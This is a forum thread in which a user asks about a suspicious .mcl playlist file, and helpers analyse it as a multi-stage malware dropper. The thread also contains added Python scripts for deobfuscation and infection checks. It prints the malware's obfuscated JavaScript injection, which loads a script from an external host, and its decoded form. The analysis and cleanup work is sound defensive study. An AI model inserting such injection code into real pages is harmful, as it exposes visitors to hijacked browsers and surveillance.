.mcl Virus?

No problems per se, but I’ve kept my computer offline, except when posting here, since it happened.

Does that mean it is from Amazon? Because after reading this: http://blog.trendmicro.com/trendlabs-security-intelligence/windows-media-center-hacking-team-bug-fixed-in-september-2015-patch-tuesday/ the way I understood it was that this file type (normally to do with Windows Media Center) shouldn’t be able to execute code, and the fact it can is a security flaw.

I might have had Amazon open, but I closed my tabs too quickly and can’t remember what pages were open at the time.

The most worrying part for me, as I mentioned before, is that it downloaded itself so suddenly – how is it possible for that to happen at all? @_@

Thanks for your help.

I mean, the security flaw has apparently been fixed in a Windows Update, so how it got there is definitely my biggest concern.

Sorry for posting again, but I forgot to mention that after the computer restarted when I tried the fixlist.txt file, the mouse became incredibly laggy and moved at about 1fps! It stayed like that for a minute or so.

Maybe irrelevant, but that doesn’t normally happen…

Before I go to sleep, one last observation.
I have the Avast Online Security extension on Chrome, and it seems to be behaving unusually.

  1. It doesn’t display the icon next to Google results to say if the site is safe (I think it was a green tick icon? It’s gone now, and was there before, I changed nothing).

  2. It said this site (forum.avast.com) is an unknown site (but has now changed to safe).

I hope to have a reply in the morning, I’m sorry I keep posting, I am worried…

As MS has patched Windows then it is of no concern and you are safe. I have never seen that type of text before, but it is used by YouTube if you have a multiple set of videos to play.

Could you check AOS settings and ensure that they are as they should be?

I checked my Avast Online Security extension settings.
They seem fine, however in Incognito mode the green ticks do not appear next to the results.

I understand that this file itself can do no harm as it is patched.
I am more concerned about how it downloaded, since I am still unsure what the implications of that are on my machine.

I am not sure what you mean about the “type of text” you haven’t seen before, and how it all relates to YouTube and Amazon.
If the file is not intended to be malicious, what does the code mean, why is it saved in a .mcl file type which normally relates to Windows Media Center, and why did it suddenly download itself with no input from me? And why is the first recorded instance of it, according to virustotal.com, in the last couple of days?

I’m sorry for being an idiot, but I don’t understand fully… :(

Also the Avast Internet Security icon has a number next to it displaying how many tracking systems are on the site.
That was almost definitely there all along, but just in case… :stuck_out_tongue:

(I know I’m an idiot, but I didn’t notice that before. Just trying to give all the information. :P)

Yes, this is definitely malicious. The “exploit” is simple: Somehow they managed to download a playlist file to you, which will run an application. As you can see in the text-file:

If this file is executed, it is supposed to download the above file via an SMB share (which you can see because it starts with a \\, it's a network share). At the time of this post, the IP suppresses any ping requests, but the SMB share is still up and running. In the \Users directory, there's an "Administartor" and a "Public" folder, but there are no files in it except for the file mentioned above. In this directory you will find a 4.25 MB big file "update.exe", created on October 12th 2015, according to the metadata. Here's a virustotal link: https://www.virustotal.com/de/file/084fa217f3acad97b5f9e95ee776f8fd85dfe6dbfd12194b10102e37f29bb4b0/analysis/1444926798/. If you unpack this .exe file, you will see the files it will try to install:
15.10.2015  21:05    <DIR>          .
15.10.2015  21:05    <DIR>          ..
15.10.2015  21:05    <DIR>          $PLUGINSDIR
15.10.2015  21:05    <DIR>          $SYSDIR
15.10.2015  21:05    <DIR>          $WINDIR
04.10.2015  05:41           303.104 freebl3.dll
04.10.2015  05:41           295.424 libnspr4.dll
04.10.2015  05:41            48.640 libplc4.dll
04.10.2015  05:41            46.080 libplds4.dll
04.10.2015  05:41           184.224 N1Cert.dll
04.10.2015  05:41           284.544 N1LSP.exe
04.10.2015  05:41               116 N1LSP.ini
04.10.2015  05:41           328.560 N1LSP64.exe
04.10.2015  05:41           324.760 N1Service.dll
04.10.2015  05:41         1.314.616 N1Service.exe
04.10.2015  05:41            51.936 N1Service.tlb
04.10.2015  05:41           370.744 N1Service64.dll
04.10.2015  05:41           847.872 NMI.dll
04.10.2015  05:41           854.528 nss3.dll
04.10.2015  05:41           417.280 nssckbi.dll
04.10.2015  05:41           164.352 nssdbm3.dll
04.10.2015  05:41           135.680 nssutil3.dll
04.10.2015  05:41            51.936 PCProxy.tlb
04.10.2015  05:41           132.608 smime3.dll
04.10.2015  05:41           230.400 softokn3.dll
04.10.2015  05:41           455.168 sqlite3.dll
04.10.2015  05:41           228.352 ssl3.dll

Most notably, the files inside “$Sysdir” with the names “N1Service.ini” and “N1ServiceOff” indicate that some services will be installed on your computer, and under “$WINDIR\msservice\MSService.xml” you will even find a nice piece of JavaScript which will be injected into your web browser.

document.write("<scr" + "ipt type='text/javascript'>var d='.'; var tld='xyz'; var dm='nwcdn'; var analytics='b'; var e='js'; var f='placement';");
document.write("</" + "scr" + "ipt>");
document.write("<scr" + "ipt type='text/javascript' src='//" + analytics + d + dm + d + tld + "/" + f + d + e + "'>");
document.write("</" + "scr" + "ipt>");

The document.write()s can be deobfuscated to

<script type='text/javascript'>var d='.'; var tld='xyz'; var dm='nwcdn'; var analytics='b'; var e='js'; var f='placement';
</script>
<script type='text/javascript' src='//b.nwcdn.xyz/placement.js'> </script>

A malwr.com analysis further shows that it

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate)
Installs itself for autorun at Windows startup
The "N1LSP.exe" is part of the "Network Manager Suite", published by "Nite Media LLC" (this seems to be actually legit software according to [url=http://appquantify.com/p154964-network-manager-suite.aspx]this[/url]), which runs approx. 0.5 seconds after the update.exe is executed, according to the malwr.com behavior analysis. So all in all, seems like a good package of malware and surveillance software which the "update.exe" tries to download and execute on your computer. Especially look to clean up any services and files which are listed above.
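The deobfuscation shown above can be done mechanically rather than by hand. The script below is an added example, not code from the post and not part of the malware: it takes the four document.write() lines quoted above as its input, concatenates the string literals of each call, resolves identifiers such as `analytics` and `tld` from the `var x='y'` assignments it finds in the snippet, and then lists the script src URLs present in the rebuilt HTML. Nothing is executed and nothing is fetched, so it is safe to run on a captured injection snippet; an identifier it cannot resolve is left as `${name}` so the analyst can see the gap.

```python
import re

# Constructed copy of the four document.write() lines quoted in the post above.
INJECTED_JS = r'''
document.write("<scr" + "ipt type='text/javascript'>var d='.'; var tld='xyz'; var dm='nwcdn'; var analytics='b'; var e='js'; var f='placement';");
document.write("</" + "scr" + "ipt>");
document.write("<scr" + "ipt type='text/javascript' src='//" + analytics + d + dm + d + tld + "/" + f + d + e + "'>");
document.write("</" + "scr" + "ipt>");
'''

# One document.write(...) call per line; greedy match up to the last ')'.
WRITE_RE = re.compile(r"^\s*document\.write\((.*)\)\s*;?\s*$")
# Tokens inside the argument: "literal", 'literal', or an identifier. '+' and
# whitespace are simply skipped by the scanner.
TOKEN_RE = re.compile(r'''"((?:[^"\\]|\\.)*)"|'((?:[^'\\]|\\.)*)'|([A-Za-z_$][\w$]*)''')
# var name='value' / var name="value" assignments, wherever they appear
# (in the outer code or inside a written string).
VAR_RE = re.compile(r"""\bvar\s+([A-Za-z_$][\w$]*)\s*=\s*(?:'((?:[^'\\]|\\.)*)'|"((?:[^"\\]|\\.)*)")""")


def unescape(literal: str) -> str:
    """Resolve simple JS backslash escapes (\\" \\' \\\\) in a string literal body."""
    return re.sub(r"\\(.)", r"\1", literal)


def collect_vars(js: str) -> dict:
    """Build a symbol table from every string-valued var assignment in the snippet."""
    symbols = {}
    for name, sq, dq in VAR_RE.findall(js):
        symbols[name] = unescape(sq if sq else dq)
    return symbols


def evaluate_concat(expr: str, symbols: dict) -> str:
    """Evaluate a '+' chain of string literals and identifiers without running JS."""
    parts = []
    for dq, sq, ident in TOKEN_RE.findall(expr):
        if ident:
            parts.append(symbols.get(ident, "${" + ident + "}"))
        else:
            parts.append(unescape(dq if dq else sq))
    return "".join(parts)


def deobfuscate(js: str) -> str:
    """Return the HTML that the document.write() calls would have emitted."""
    symbols = collect_vars(js)
    html = []
    for line in js.splitlines():
        m = WRITE_RE.match(line)
        if m:
            html.append(evaluate_concat(m.group(1), symbols))
    return "".join(html)


def script_sources(html: str) -> list:
    """List the src attributes of <script> tags in the rebuilt HTML."""
    return re.findall(r"<script[^>]*\ssrc=['\"]([^'\"]+)['\"]", html, flags=re.I)


if __name__ == "__main__":
    rebuilt = deobfuscate(INJECTED_JS)
    print(rebuilt)
    for src in script_sources(rebuilt):
        print("external script:", src)
```

Running it prints the two script tags from the post and `external script: //b.nwcdn.xyz/placement.js`, which is the indicator worth blocking or searching proxy logs for.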

Thanks for your post.

I can’t say I understand everything here, but it is helpful information.

I didn’t click the file, so what is the situation for me? Will it have installed at Startup? I ask because in your last quote it says “Installs itself for autorun at Windows startup”.
There is no “Administrator” folder in the “/Users” directory, but there is a “Public” folder.

And do you have a clue how they managed to download the file to my machine?

I will not make any changes to my machine solely based on your input, however, because you are not an established member. I hope you understand why.

Also, what is an SMB share?

The file did not activate on your system as Avast would have alerted on the exe file and JavaScript.

It was probably a drive-by download https://en.wikipedia.org/wiki/Drive-by_download

[quote]I didn't click the file, so what is the situation for me? And do you have a clue how they managed to download the file to my machine?[/quote]
If the file didn't get executed, there's nothing to fear. Just like you would download an .exe file but never execute it. [b]However[/b], chances are, since the playlist.mcl magically showed up in your Chrome, that the original exploit (the previous people discussed a zero-day exploit for Windows) triggered the download of the playlist.mcl, which in turn, when executed, downloaded and executed the "update.exe" from the SMB share mentioned above. In that case, the exploit would have executed the payload for you. So we're talking about a 4-stage process here (original exploit (browser drive-by or exploit / Windows zero-day) -> download and execute playlist.mcl -> download and execute 'update.exe' from a rented Amazon server via SMB -> installs services and maybe additional malware). It's hard to say post-action what exactly has triggered the download of that file. As mentioned above, it could be a browser drive-by download or some other browser exploit from a malicious site you visited, could be because of the exploitation of recent Windows vulnerabilities, could be already installed malware that did this, so I'm also agreeing with
[quote]It was probably a drive-by download https://en.wikipedia.org/wiki/Drive-by_download[/quote]
on this.
[quote]There is no "Administrator" folder in the "/Users" directory, but there is a "Public" folder.[/quote]
Here I was referring to the machine that provides the "update.exe" file (the rented Amazon-Cloud machine), not your local machine, so that's not relevant to you.
[quote]Also, what is an SMB share?[/quote]
SMB (or "Samba", in Linux speak) is the network-drive sharing service on Windows. You can share your local files over the network with this network service, you may know that as the feature that says "Share files and directories over the network" in your network control center in the control panel. That is the way they distributed the 'update.exe' to you, by making the file publicly accessible through an SMB share.
One more thing could be interesting: Did Chrome report where the playlist.mcl was downloaded from? There's a "copy download link" option in the right-click menu for every downloaded file inside Chrome. Something that will have definitely left a trace is the installation of the Windows service, if the "update.exe" ever got executed. You can search your activity logs (Event Viewer) in Windows for when the "N1LSP.exe" (or similar filename) was installed on your computer, [b]if[/b] you didn't already revert back with a system restore or something. Also, from the malwr.com analysis, it writes itself in the registry, under the keys "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\update.exe" and "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{20D04FE0-3AEA-1069-A2D8-08002B30309D}" (use regedit.exe to confirm this).
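The two checks suggested above (Event Viewer for the service installation, regedit for the two keys) can be scripted so they are repeatable. The following is an added example, not the poster's tooling, and it relies on two facts the post does not state: the Service Control Manager logs Event ID 7045 ("A service was installed in the system") to the System log whenever a service is created, and `wevtutil qe System /f:text` dumps that log as text. The sample log text is constructed to look like that output (the paths in it are invented); the indicator file names and registry keys come from the posts above. Matching is on the exact image file name rather than a substring, because a plain "update.exe" substring search also hits Google Update, which is exactly the noise the user ran into in regedit.

```python
import re
import subprocess
import sys

# Indicators from the posts above (file names from the unpacked update.exe, keys from malwr.com).
SUSPICIOUS_IMAGES = {"update.exe", "n1lsp.exe", "n1lsp64.exe", "n1service.exe"}
REGISTRY_KEYS = (
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\update.exe",
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{20D04FE0-3AEA-1069-A2D8-08002B30309D}",
)

# Constructed sample shaped like `wevtutil qe System /f:text` output: one malicious
# service install next to a legitimate Google Update install (paths are invented).
SAMPLE_LOG = """\
Event[0]:
  Log Name: System
  Source: Service Control Manager
  Event ID: 7045
  Description:
A service was installed in the system.

Service Name:  N1Service
Service File Name:  C:\\Windows\\msservice\\N1Service.exe
Service Type:  user mode service
Service Start Type:  auto start
Service Account:  LocalSystem

Event[1]:
  Log Name: System
  Source: Service Control Manager
  Event ID: 7045
  Description:
A service was installed in the system.

Service Name:  gupdate
Service File Name:  "C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe" /svc
Service Type:  user mode service
Service Start Type:  auto start
Service Account:  LocalSystem
"""


def parse_service_installs(text: str) -> list:
    """Return (service name, image path) pairs from Event ID 7045 records in wevtutil text output."""
    installs = []
    for block in re.split(r"^Event\[\d+\]:", text, flags=re.M):
        if not re.search(r"Event ID:\s*7045\b", block):
            continue
        name = re.search(r"Service Name:\s*(.+)", block)
        path = re.search(r"Service File Name:\s*(.+)", block)
        if name and path:
            installs.append((name.group(1).strip(), path.group(1).strip()))
    return installs


def image_basename(path: str) -> str:
    """Strip quoting and arguments from a service image path and return the lower-cased file name."""
    m = re.match(r'\s*"([^"]+)"|\s*(\S+)', path)
    exe = (m.group(1) or m.group(2)) if m else path
    return exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def suspicious_installs(installs: list) -> list:
    """Keep installs whose image is one of the indicator binaries or whose name starts with N1."""
    return [
        (name, path)
        for name, path in installs
        if image_basename(path) in SUSPICIOUS_IMAGES or name.lower().startswith("n1")
    ]


def query_service_installs_live() -> list:
    """Windows only: pull Event ID 7045 records from the System log via wevtutil."""
    out = subprocess.run(
        ["wevtutil", "qe", "System", "/q:*[System[(EventID=7045)]]", "/f:text"],
        capture_output=True, text=True, check=True,
    ).stdout
    return parse_service_installs(out)


def registry_keys_present(keys=REGISTRY_KEYS) -> dict:
    """Windows only: report which of the indicator keys exist under HKEY_LOCAL_MACHINE."""
    import winreg  # standard library, but only importable on Windows
    present = {}
    for key in keys:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key):
                present[key] = True
        except OSError:
            present[key] = False
    return present


if __name__ == "__main__":
    if sys.platform == "win32":
        print("suspicious service installs:", suspicious_installs(query_service_installs_live()))
        print("indicator registry keys:", registry_keys_present())
    else:
        print("not on Windows; parsing the constructed sample instead")
        print(suspicious_installs(parse_service_installs(SAMPLE_LOG)))
```

On the constructed sample only N1Service is reported; the gupdate record is correctly ignored. An empty result from the live functions is consistent with what the thread concluded, that update.exe never ran.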

I always use Incognito Mode in Chrome, because I do not need a Web History. This unfortunately means my “Downloads” (CTRL+J) are wiped when I close Chrome.
I will try the other two things you mentioned (Event Viewer and Registry).

I’m sorry for misinterpreting what you said. I thought you meant my machine because you followed it with “In this directory you will find a 4.25 MB big file “update.exe”, created on October 12th 2015, according to the metadata”, so I assumed I should look for this file on my local machine.
I’m not sure what this meant if you are not referring to my local machine (but really, I don’t understand half of this… :P).

How do I access the necessary activity log in Event Viewer?

I could not find either of those keys in those locations in the registry (regedit.exe).

Then, I typed both “update.exe” and “{20D04FE0-3AEA-1069-A2D8-08002B30309D}” into “Find…” to be sure.
“update.exe” search resulted in a few Google Update-related things.
“{20D04FE0-3AEA-1069-A2D8-08002B30309D}” was present in various locations, but not where you mentioned.

I’m sure that is all irrelevant though – I could not find them in the locations you mentioned.

What he posted was a list of the malware infection points… You do not have this at all…

It was neutered before it was activated when you closed Chrome.

I’m confused, sorry…

Does this not mean I may have malware on my machine?

I’m trying to be helpful, I thought this was directed at me, so was looking at those things…

Sorry for being so hopelessly confused by all this… :-\ :)

Does this not mean I may have malware on my machine?
If so essexboy would have found it ;)

I’m still not sure of the exact situation (and would appreciate a recap :P) but does this mean I can delete the original file (now renamed to playlist.txt)?
Can I go on using my computer as usual, or are there still unanswered questions that mean it would be wise to wait…?

Can someone explain what this means, if it isn’t addressed to me? It seems like pseud0randomness is telling me to check things such as activity logs (Event Viewer), but apparently not…?

It’s alright, it was already determined that the update.exe didn’t fire and that you have no signs of infection in regards to that malware. My post just contained some points that you could have a look at in order to verify that again. So as it seems, your computer is free of that malware.
Also, we can celebrate a success: After filing an abuse report for the Amazon AWS instance which distributed the malware to you, I received:

Dear Abuse Reporter,

Thank you for submitting your abuse report.

We’ve determined that an Amazon EC2 instance was running at the IP address you provided in your abuse report. We’ll investigate the complaint to determine what additional actions, if any, need to be taken in this case.
Thanks again for alerting us to this issue.


And the download link is now down.